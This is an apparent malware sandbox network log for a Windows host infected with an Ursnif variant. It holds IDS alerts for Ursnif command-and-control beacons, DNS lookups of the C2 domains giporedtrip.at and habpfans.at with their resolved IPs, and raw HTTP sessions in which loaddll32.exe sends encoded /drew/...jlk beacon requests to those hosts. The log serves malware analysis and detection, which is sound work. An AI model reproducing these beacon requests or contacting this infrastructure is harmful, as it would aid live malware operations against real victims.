                        01/26/22-17:04:53.808751 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49812 | 80 | 192.168.2.5 | 31.214.157.187
                        01/26/22-17:05:14.219179 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49814 | 80 | 192.168.2.5 | 13.107.43.16
                        01/26/22-17:05:55.173450 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49825 | 80 | 192.168.2.5 | 181.129.180.251
                        01/26/22-17:06:16.920281 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49827 | 80 | 192.168.2.5 | 61.36.14.230
                        01/26/22-17:06:38.188650 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49828 | 80 | 192.168.2.5 | 31.214.157.187
                        01/26/22-17:06:59.014573 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49829 | 80 | 192.168.2.5 | 13.107.43.16
                        01/26/22-17:06:59.014573 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49829 | 80 | 192.168.2.5 | 13.107.43.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 26, 2022 17:04:10.702095032 CET | 192.168.2.5 | 8.8.8.8 | 0xb2e | Standard query (0) | giporedtrip.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.537123919 CET | 192.168.2.5 | 8.8.8.8 | 0x72f | Standard query (0) | habpfans.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.678286076 CET | 192.168.2.5 | 8.8.8.8 | 0xdb34 | Standard query (0) | giporedtrip.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.351515055 CET | 192.168.2.5 | 8.8.8.8 | 0x5295 | Standard query (0) | habpfans.at | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 211.119.84.112 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 210.92.250.133 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 187.232.235.234 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 183.100.39.157 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 203.228.9.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 41.41.255.235 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 186.6.45.193 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 41.41.255.235 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 186.6.45.193 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 211.119.84.112 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 210.92.250.133 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 187.232.235.234 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 183.100.39.157 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 203.228.9.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 181.129.180.251 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 222.236.49.124 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 187.212.179.214 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 95.104.121.111 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 178.31.236.98 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 31.167.149.141 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 58.235.189.190 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 61.36.14.230 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 14.51.96.70 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 61.36.14.230 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 14.51.96.70 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 181.129.180.251 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 222.236.49.124 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 187.212.179.214 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 95.104.121.111 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 178.31.236.98 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 31.167.149.141 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 58.235.189.190 | A (IP address) | IN (0x0001)
                        • 194.76.226.200
                        • giporedtrip.at
                        • habpfans.at
                        • 31.214.157.187
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49758 | 194.76.226.200 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:03:50.217694044 CET | 1190 | OUT | GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.226.200
Jan 26, 2022 17:03:50.485863924 CET | 1191 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:03:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: keep-alive
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49771 | 211.119.84.112 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:04:11.131587029 CET | 8224 | OUT | GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: giporedtrip.at
Jan 26, 2022 17:04:12.363171101 CET | 11882 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:04:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: close
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49781 | 41.41.255.235 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:04:32.817919970 CET | 17822 | OUT | GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: habpfans.at
Jan 26, 2022 17:04:33.531102896 CET | 17823 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:04:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: close
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49812 | 31.214.157.187 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:04:53.808751106 CET | 17909 | OUT | GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 31.214.157.187
Jan 26, 2022 17:04:54.068263054 CET | 17910 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:04:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: keep-alive
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49816 | 194.76.226.200 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:05:34.308445930 CET | 17926 | OUT | GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.226.200
Jan 26, 2022 17:05:34.582305908 CET | 17927 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:05:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: keep-alive
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID:5
                        Source IP:192.168.2.5
                        Source Port:49825
                        Destination IP:181.129.180.251
                        Destination Port:80
                        Process:C:\Windows\System32\loaddll32.exe
                        Timestamp:Jan 26, 2022 17:05:55.173449993 CET
                        kBytes transferred:18600
                        Direction:OUT
                        Data:
                        GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: giporedtrip.at
                        Timestamp:Jan 26, 2022 17:05:56.107831001 CET
                        kBytes transferred:18601
                        Direction:IN
                        Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:05:55 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID:6
                        Source IP:192.168.2.5
                        Source Port:49827
                        Destination IP:61.36.14.230
                        Destination Port:80
                        Process:C:\Windows\System32\loaddll32.exe
                        Timestamp:Jan 26, 2022 17:06:16.920280933 CET
                        kBytes transferred:18609
                        Direction:OUT
                        Data:
                        GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: habpfans.at
                        Timestamp:Jan 26, 2022 17:06:18.136353016 CET
                        kBytes transferred:18610
                        Direction:IN
                        Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:17 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID:7
                        Source IP:192.168.2.5
                        Source Port:49828
                        Destination IP:31.214.157.187
                        Destination Port:80
                        Process:C:\Windows\System32\loaddll32.exe
                        Timestamp:Jan 26, 2022 17:06:38.188649893 CET
                        kBytes transferred:18611
                        Direction:OUT
                        Data:
                        GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 31.214.157.187
                        Timestamp:Jan 26, 2022 17:06:38.456873894 CET
                        kBytes transferred:18611
                        Direction:IN
                        Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 